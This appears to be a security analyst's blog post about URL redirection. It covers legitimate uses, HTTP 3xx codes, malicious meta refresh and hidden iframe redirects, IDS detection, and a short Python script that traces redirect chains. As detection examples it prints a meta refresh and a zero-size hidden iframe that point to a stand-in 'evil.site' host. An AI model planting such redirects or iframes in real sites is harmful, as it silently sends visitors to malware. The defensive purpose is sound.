URL redirection also called URL forwarding is not all malicious and has valid and acceptable uses. The technique allows servers to redirect a client request to a different location of a page, site or domain for legitimate reasons. In a redirect a web browser attempts to open a URL and that request is forwarded on to another location. Some of the legitimate reasons for URL redirection include:
A very common example of this is redirecting users to a mobile version of a website. If a user browses a site with a mobile client they could automatically be forwarded to a corresponding mobile version of a website.
Typically seen on sites targeting larger audiences in more then one location essentially redirects users to more relevant localized content.
Removing referer details
When a link is clicked the browser sends the referer field which could contain sensitive URLs that end up in the server logs of an external site. for example, http://packetreport.com/future-plans would not be a desirable referer field leaving an organization, a redirection page would remove the exposure.
Similar domain names
Users might type in a misspelled domain such as packtereport.com and get redirected to our actual site packetreport.com. This safeguards both the audience as well as the organization.
Redirection Used in Exploits
As a security analyst we see this everyday of the week, a user suddenly sets off an IDS alert for touching a known malware site or bad domain. I am always curious to see why this happened and in most cases the user did one of three things clicked a link or opened a document in a phish or browsed a compromised site that has a malicious redirect configured. The following examples are not a complete list of techniques but the most common malicious redirects.
The HTTP 3xx Redirection status code indicates the client must take additional action to complete the request. Many of these status codes are used in URL redirection the three most common are 301 Moved Permanently, 302 Found and 307 Temporary Redirection.
301 Moved Permanently This is known as a permanent redirect and is used to indicate that the originating URL has permanently moved to a new location.
302 Found Indicates the target resource resides temporarily under a different URI.
307 Temporary Redirect The target resource resides temporarily under a different URI and the user agent must not change the request method if it performs an automatic redirection to that URI.
This is a client-side redirection and tells the browser to request another page.
To create an HTML redirect page, you use the HTML meta tag, along with the ‘http-equiv’ and ‘content’ attributes. Meta Refresh is a special meta tag contained with the header section of the HTML source. This will refresh the page to the new site listed after the url field. The number after content attribute is the seconds to load, if set to 0 it redirects immediately as the page is loading.
What to look for:
- <meta http-equiv=”Refresh” content=”0; url=http://www.evil.site/” />
What to look for:
This is a method where the content of another page is shown within an iframe or frameset, so that it looks like the content is part of the original URL. Especially dangerous are hidden iframe with a width and/or height values of 0 or a few pixels are hardly visible to the user.
What to look for:
- <iframe src=”hxxp://evil.site/count.php?o=1″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
These methods explained above are not new and revolutionary, hard to detect or very sneaky but they do work and malware authors will continue to use them in the future. Redirecting users to malicious content using http redirects or embedded iFrames is not going to trend downwards or cease to be a easy way to deliver malicious content anytime soon. Detecting the redirect using IDS signatures or black lists and blocking the subsequent chain is always key.
Simple script that follows the HTTP redirections and displays the resulting HTTP Status Codes
—————– http-redirect.py ——————-
r = requests.get(‘http://evil.site’)
for h in r.history:
print ‘[%s] %s’ % (h.status_code, h.url,)
print ‘[%s] %s’ % (r.status_code, r.url,)